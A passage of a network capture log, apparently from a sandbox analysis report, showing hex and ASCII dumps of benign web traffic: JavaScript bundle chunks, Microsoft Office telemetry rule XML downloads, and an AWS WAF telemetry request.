                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: wXEcB57uwkS3jp_rhxcYZ9i4TqsvbsOUigk4knOeqvlDwR-LPrTKMg==
                                                                                                                                                                                                                                                                                Age: 45982
                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC15835INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 74 65 6e 61 6e 74 6d 67 74 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 72 3d 7b 7d 2c 6e 3d 7b 7d 2c 6f 3d 7b 7d 2c 69 3d 7b 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 72 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 7b 73 65 74 74 65 72 73 3a 5b 66 75 6e 63 74 69 6f 6e 28 65 29 7b 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29
                                                                                                                                                                                                                                                                                Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevtenantmgtpilet,{})System.register(["react","react-dom","react-router-dom","tslib"],(function(e,t){var r={},n={},o={},i={};return Object.defineProperty(r,"__esModule",{value:!0}),{setters:[function(e){Object.keys(e)
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC16384INData Raw: 69 6f 6e 7d 29 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 6e 65 65 64 73 49 46 72 61 6d 65 41 75 74 68 46 6f 72 43 6f 6e 6e 65 63 74 6f 72 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 73 42 72 6f 77 73 65 72 28 22 65 64 67 65 22 29 7c 7c 74 68 69 73 2e 69 73 42 72 6f 77 73 65 72 28 22 73 61 66 61 72 69 22 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 69 73 42 72 6f 77 73 65 72 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6e 61 76 69 67 61 74 6f 72 26 26 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2e 69 6e 63 6c 75 64 65 73 28 65 29 7d 2c 65 7d 28 29 3b 66 75 6e 63 74 69 6f 6e 20 50 28 65 29 7b 76
                                                                                                                                                                                                                                                                                Data Ascii: ion}))},e.prototype.needsIFrameAuthForConnectors=function(){return this.isBrowser("edge")||this.isBrowser("safari")},e.prototype.isBrowser=function(e){return"undefined"!=typeof navigator&&navigator.userAgent.toLowerCase().includes(e)},e}();function P(e){v
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC16384INData Raw: 61 63 65 28 2f 25 35 44 2f 67 69 2c 22 5d 22 29 7d 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 69 66 28 21 74 29 72 65 74 75 72 6e 20 65 3b 76 61 72 20 69 3b 69 66 28 72 29 69 3d 72 28 74 29 3b 65 6c 73 65 20 69 66 28 6e 2e 69 73 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 28 74 29 29 69 3d 74 2e 74 6f 53 74 72 69 6e 67 28 29 3b 65 6c 73 65 7b 76 61 72 20 61 3d 5b 5d 3b 6e 2e 66 6f 72 45 61 63 68 28 74 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 6e 75 6c 6c 21 3d 65 26 26 28 6e 2e 69 73 41 72 72 61 79 28 65 29 3f 74 2b 3d 22 5b 5d 22 3a 65 3d 5b 65 5d 2c 6e 2e 66 6f 72 45 61 63 68 28 65 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 2e 69 73 44 61 74 65 28 65 29 3f 65 3d 65 2e 74 6f 49 53 4f 53 74 72 69 6e 67 28 29 3a
                                                                                                                                                                                                                                                                                Data Ascii: ace(/%5D/gi,"]")}e.exports=function(e,t,r){if(!t)return e;var i;if(r)i=r(t);else if(n.isURLSearchParams(t))i=t.toString();else{var a=[];n.forEach(t,(function(e,t){null!=e&&(n.isArray(e)?t+="[]":e=[e],n.forEach(e,(function(e){n.isDate(e)?e=e.toISOString():
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC16384INData Raw: 76 20 67 6f 76 20 69 6e 74 20 6d 69 6c 20 6e 65 74 20 22 2c 73 61 3a 22 20 63 6f 6d 20 65 64 75 20 67 6f 76 20 6d 65 64 20 6e 65 74 20 6f 72 67 20 70 75 62 20 73 63 68 20 22 2c 73 64 3a 22 20 63 6f 6d 20 65 64 75 20 67 6f 76 20 69 6e 66 6f 20 6d 65 64 20 6e 65 74 20 6f 72 67 20 74 76 20 22 2c 73 65 3a 22 20 61 20 61 63 20 62 20 62 64 20 63 20 64 20 65 20 66 20 67 20 68 20 69 20 6b 20 6c 20 6d 20 6e 20 6f 20 6f 72 67 20 70 20 70 61 72 74 69 20 70 70 20 70 72 65 73 73 20 72 20 73 20 74 20 74 6d 20 75 20 77 20 78 20 79 20 7a 20 22 2c 73 67 3a 22 20 63 6f 6d 20 65 64 75 20 67 6f 76 20 69 64 6e 20 6e 65 74 20 6f 72 67 20 70 65 72 20 22 2c 73 6e 3a 22 20 61 72 74 20 63 6f 6d 20 65 64 75 20 67 6f 75 76 20 6f 72 67 20 70 65 72 73 6f 20 75 6e 69 76 20 22 2c 73 79
                                                                                                                                                                                                                                                                                Data Ascii: v gov int mil net ",sa:" com edu gov med net org pub sch ",sd:" com edu gov info med net org tv ",se:" a ac b bd c d e f g h i k l m n o org p parti pp press r s t tm u w x y z ",sg:" com edu gov idn net org per ",sn:" art com edu gouv org perso univ ",sy
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC16384INData Raw: 22 3d 3d 74 79 70 65 6f 66 20 6e 2e 53 65 63 6f 6e 64 4c 65 76 65 6c 44 6f 6d 61 69 6e 73 2e 6e 6f 43 6f 6e 66 6c 69 63 74 26 26 28 74 2e 53 65 63 6f 6e 64 4c 65 76 65 6c 44 6f 6d 61 69 6e 73 3d 6e 2e 53 65 63 6f 6e 64 4c 65 76 65 6c 44 6f 6d 61 69 6e 73 2e 6e 6f 43 6f 6e 66 6c 69 63 74 28 29 29 2c 74 7d 72 65 74 75 72 6e 20 6e 2e 55 52 49 3d 3d 3d 74 68 69 73 26 26 28 6e 2e 55 52 49 3d 6f 29 2c 74 68 69 73 7d 2c 61 2e 62 75 69 6c 64 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 30 3d 3d 3d 65 3f 74 68 69 73 2e 5f 64 65 66 65 72 72 65 64 5f 62 75 69 6c 64 3d 21 30 3a 28 65 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 7c 7c 74 68 69 73 2e 5f 64 65 66 65 72 72 65 64 5f 62 75 69 6c 64 29 26 26 28 74 68 69 73 2e 5f 73 74 72 69 6e 67 3d 69 2e 62 75 69 6c
                                                                                                                                                                                                                                                                                Data Ascii: "==typeof n.SecondLevelDomains.noConflict&&(t.SecondLevelDomains=n.SecondLevelDomains.noConflict()),t}return n.URI===this&&(n.URI=o),this},a.build=function(e){return!0===e?this._deferred_build=!0:(e===undefined||this._deferred_build)&&(this._string=i.buil
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC16384INData Raw: 48 6f 73 74 6e 61 6d 65 3d 21 21 65 2c 74 68 69 73 7d 2c 61 2e 64 75 70 6c 69 63 61 74 65 51 75 65 72 79 50 61 72 61 6d 65 74 65 72 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 70 61 72 74 73 2e 64 75 70 6c 69 63 61 74 65 51 75 65 72 79 50 61 72 61 6d 65 74 65 72 73 3d 21 21 65 2c 74 68 69 73 7d 2c 61 2e 65 73 63 61 70 65 51 75 65 72 79 53 70 61 63 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 70 61 72 74 73 2e 65 73 63 61 70 65 51 75 65 72 79 53 70 61 63 65 3d 21 21 65 2c 74 68 69 73 7d 2c 69 7d 29 29 7d 2c 33 31 33 32 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 76 61 72 20 6e 3b 65 3d 72 2e 6e 6d 64 28 65 29 2c 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 74 26 26 74 2e 6e 6f 64 65 54
                                                                                                                                                                                                                                                                                Data Ascii: Hostname=!!e,this},a.duplicateQueryParameters=function(e){return this._parts.duplicateQueryParameters=!!e,this},a.escapeQuerySpace=function(e){return this._parts.escapeQuerySpace=!!e,this},i}))},3132:function(e,t,r){var n;e=r.nmd(e),function(o){t&&t.nodeT
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC16384INData Raw: 65 79 73 2e 6c 65 6e 67 74 68 7d 7d 2c 7b 6b 65 79 3a 22 69 6e 74 65 72 6e 61 6c 47 65 74 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 72 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 61 72 67 75 6d 65 6e 74 73 5b 31 5d 21 3d 3d 75 6e 64 65 66 69 6e 65 64 26 26 61 72 67 75 6d 65 6e 74 73 5b 31 5d 2c 6f 3d 7b 6d 61 70 3a 74 68 69 73 2e 63 61 63 68 65 7d 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 6f 3f 6f 3d 6e 75 6c 6c 3d 3d 3d 28 74 3d 6f 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 7c 7c 6e 75 6c 6c 3d 3d 3d 28 74 3d 74 2e 6d 61 70 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 67 65 74 28 65 29 3a 6f 3d 75 6e 64 65
                                                                                                                                                                                                                                                                                Data Ascii: eys.length}},{key:"internalGet",value:function(e){var t,r,n=arguments.length>1&&arguments[1]!==undefined&&arguments[1],o={map:this.cache};return e.forEach((function(e){var t;o?o=null===(t=o)||void 0===t||null===(t=t.map)||void 0===t?void 0:t.get(e):o=unde
                                                                                                                                                                                                                                                                                2024-10-09 18:05:24 UTC16384INData Raw: 2c 75 6e 69 74 6c 65 73 73 3a 69 2c 69 67 6e 6f 72 65 3a 61 2c 73 63 6f 70 65 3a 75 7d 29 2c 32 29 2c 73 3d 6f 5b 30 5d 2c 63 3d 6f 5b 31 5d 3b 72 65 74 75 72 6e 5b 73 2c 63 2c 54 74 28 70 2c 63 29 2c 72 5d 7d 29 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 6d 28 65 2c 33 29 5b 32 5d 3b 6c 65 26 26 50 28 74 2c 7b 6d 61 72 6b 3a 5a 7d 29 7d 29 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 6d 28 65 2c 33 29 2c 6e 3d 74 5b 31 5d 2c 6f 3d 74 5b 32 5d 3b 69 66 28 6e 29 7b 76 61 72 20 69 3d 7a 28 6e 2c 6f 2c 7b 6d 61 72 6b 3a 5a 2c 70 72 65 70 65 6e 64 3a 22 71 75 65 75 65 22 2c 61 74 74 61 63 68 54 6f 3a 64 2c 70 72 69 6f 72 69 74 79 3a 2d 39 39 39 7d 29 3b 69 5b 4a 5d 3d 66 2c 69 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 47 2c 72
                                                                                                                                                                                                                                                                                Data Ascii: ,unitless:i,ignore:a,scope:u}),2),s=o[0],c=o[1];return[s,c,Tt(p,c),r]}),(function(e){var t=m(e,3)[2];le&&P(t,{mark:Z})}),(function(e){var t=m(e,3),n=t[1],o=t[2];if(n){var i=z(n,o,{mark:Z,prepend:"queue",attachTo:d,priority:-999});i[J]=f,i.setAttribute(G,r
                                                                                                                                                                                                                                                                                2024-10-09 18:05:24 UTC16384INData Raw: 72 6e 7b 72 3a 65 28 74 68 69 73 2e 72 29 2c 67 3a 65 28 74 68 69 73 2e 67 29 2c 62 3a 65 28 74 68 69 73 2e 62 29 2c 61 3a 74 68 69 73 2e 61 7d 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 50 65 72 63 65 6e 74 61 67 65 52 67 62 53 74 72 69 6e 67 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 4d 61 74 68 2e 72 6f 75 6e 64 28 31 30 30 2a 51 74 28 65 2c 32 35 35 29 29 7d 3b 72 65 74 75 72 6e 20 31 3d 3d 3d 74 68 69 73 2e 61 3f 22 72 67 62 28 22 2e 63 6f 6e 63 61 74 28 65 28 74 68 69 73 2e 72 29 2c 22 25 2c 20 22 29 2e 63 6f 6e 63 61 74 28 65 28 74 68 69 73 2e 67 29 2c 22 25 2c 20 22 29 2e 63 6f 6e 63 61 74 28 65 28 74 68 69 73 2e 62 29 2c 22 25 29 22 29 3a 22 72 67 62 61 28 22 2e 63 6f 6e 63
                                                                                                                                                                                                                                                                                Data Ascii: rn{r:e(this.r),g:e(this.g),b:e(this.b),a:this.a}},e.prototype.toPercentageRgbString=function(){var e=function(e){return Math.round(100*Qt(e,255))};return 1===this.a?"rgb(".concat(e(this.r),"%, ").concat(e(this.g),"%, ").concat(e(this.b),"%)"):"rgba(".conc
                                                                                                                                                                                                                                                                                2024-10-09 18:05:24 UTC16384INData Raw: 69 6f 6e 22 29 3b 65 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 22 70 72 6f 74 6f 74 79 70 65 22 2c 7b 77 72 69 74 61 62 6c 65 3a 21 31 7d 29 2c 74 26 26 75 6e 28 65 2c 74 29 7d 63 6f 6e 73 74 20 66 6e 3d 6e 6e 28 28 66 75 6e 63 74 69 6f 6e 20 24 6f 28 29 7b 59 72 28 74 68 69 73 2c 24 6f 29 7d 29 29 3b 6c 65 74 20 64 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 72 3b 72 65 74 75 72 6e 20 59 72 28 74 68
                                                                                                                                                                                                                                                                                Data Ascii: ion");e.prototype=Object.create(t&&t.prototype,{constructor:{value:e,writable:!0,configurable:!0}}),Object.defineProperty(e,"prototype",{writable:!1}),t&&un(e,t)}const fn=nn((function $o(){Yr(this,$o)}));let dn=function(e){function t(e){var r;return Yr(th


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                145192.168.2.64986813.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:23 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 400
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BB2D62837"
                                                                                                                                                                                                                                                                                x-ms-request-id: de1f8e53-401e-0064-5dfb-1954af000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241009T180523Z-185b7d577bdwmw4ckbc4ywwmwg00000000y000000000636n
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                146192.168.2.64986713.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:23 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 479
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BB7D702D0"
                                                                                                                                                                                                                                                                                x-ms-request-id: b0466ff8-401e-0078-2ccf-194d34000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241009T180523Z-185b7d577bd6kqv2c47qpxmgb000000001b000000001ayzx
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                147192.168.2.64987513.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:24 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-09 18:05:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:24 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 475
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BB2BE84FD"
                                                                                                                                                                                                                                                                                x-ms-request-id: 59ae3e90-001e-0028-62d0-19c49f000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241009T180524Z-185b7d577bdfbqmxp7sbqeum4w000000016g000000019ewg
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-09 18:05:24 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                148192.168.2.64987613.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:24 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-09 18:05:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:24 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 448
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BB389F49B"
                                                                                                                                                                                                                                                                                x-ms-request-id: fee23d9a-301e-0096-1cf8-19e71d000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241009T180524Z-185b7d577bdchm66cr3227wnbw00000000t0000000012sq9
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-09 18:05:24 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                149192.168.2.64987418.173.205.914432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:24 UTC647OUTPOST /0093b71e39a6/478ed03bbf12/telemetry HTTP/1.1
                                                                                                                                                                                                                                                                                Host: 0093b71e39a6.11de9b12.us-east-1.token.awswaf.com
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                Content-Length: 1956
